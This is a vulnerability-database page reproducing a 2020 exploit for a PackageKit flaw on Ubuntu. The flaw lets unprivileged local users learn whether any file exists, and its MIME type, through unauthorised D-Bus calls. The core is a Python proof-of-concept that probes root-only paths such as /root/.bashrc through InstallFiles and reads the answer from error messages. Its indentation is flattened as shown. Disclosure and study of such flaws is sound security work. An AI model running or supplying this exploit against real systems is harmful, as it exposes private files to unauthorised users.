Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

PackageKit File Existence Disclosure

🗓️ 28 Oct 2020 00:00:00Reported by Vaisha BernardType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 364 Views

File Existence Disclosure in PackageKit <= 1.1.13-2ubuntu1 allows non-privileged users to learn the MIME type of any file on the system by exploiting methods of the d-bus interface without checking for authorization

Code
`# Exploit Title: File Existence Disclosure in PackageKit < 1.1.13-2ubuntu1  
# Date: 2020-10-27  
# Exploit Author: Vaisha Bernard (vbernard - at - eyecontrol.nl)  
# Vendor Homepage: https://www.freedesktop.org/software/PackageKit/  
# Software Link: https://www.freedesktop.org/software/PackageKit/  
# Version: <= 1.1.1+bzr982-0ubuntu32.1  
# Tested on: Ubuntu 20.04  
#  
#!/usr/bin/env python3  
#  
# Ubuntu 16.04 - 20.04   
# PackageKit <= 1.1.13-2ubuntu1  
# Sensitive Information Disclosure  
#   
#  
# Reference: https://www.eyecontrol.nl/blog/the-story-of-3-cves-in-ubuntu-desktop.html  
#  
# The InstallFiles, GetFilesLocal and GetDetailsLocal methods   
# of the d-bus interface to PackageKit accesses given files   
# before checking for authorization. This allows non-privileged   
# users to learn the MIME type of any file on the system.  
#   
# Example in attached Python script:  
#   
# $ python3 test_file_exists_pk.py /root/.bashrc  
# File exists and is of MIME type: 'text/plain'  
#   
# $ python3 test_file_exists_pk.py /root/.bashrca  
# File does not exist  
#  
#  
import dbus  
import os  
import sys  
import re  
  
if len(sys.argv) != 2:  
print("Checks if file exists and returns MIME type")  
print("Usage: %s <file>")  
sys.exit(0)  
  
FILE_TO_CHECK = sys.argv[1]  
  
bus = dbus.SystemBus()  
apt_dbus_object = bus.get_object("org.freedesktop.PackageKit", "/org/freedesktop/PackageKit")  
apt_dbus_interface = dbus.Interface(apt_dbus_object, "org.freedesktop.PackageKit")   
  
trans = apt_dbus_interface.CreateTransaction()  
  
apt_trans_dbus_object = bus.get_object("org.freedesktop.PackageKit", trans)  
apt_trans_dbus_interface = dbus.Interface(apt_trans_dbus_object, "org.freedesktop.PackageKit.Transaction")  
  
try:  
apt_trans_dbus_interface.InstallFiles(0, [FILE_TO_CHECK])  
# ALSO apt_trans_dbus_interface.GetFilesLocal([FILE_TO_CHECK])  
# ALSO apt_trans_dbus_interface.GetDetailsLocal([FILE_TO_CHECK])  
except dbus.exceptions.DBusException as e:  
if "No such file" in str(e):  
print("File does not exist")  
elif "MimeTypeNotSupported" in str(e):  
result = re.search('MIME type (.*) not supported', str(e))  
print("File exists and is of MIME type: " + result.group(1))  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
28 Oct 2020 00:00Current
7.4High risk
Vulners AI Score7.4
packagekitfile existence disclosurenon-privileged usersmime type disclosureubuntu 20.04d-bus interface
364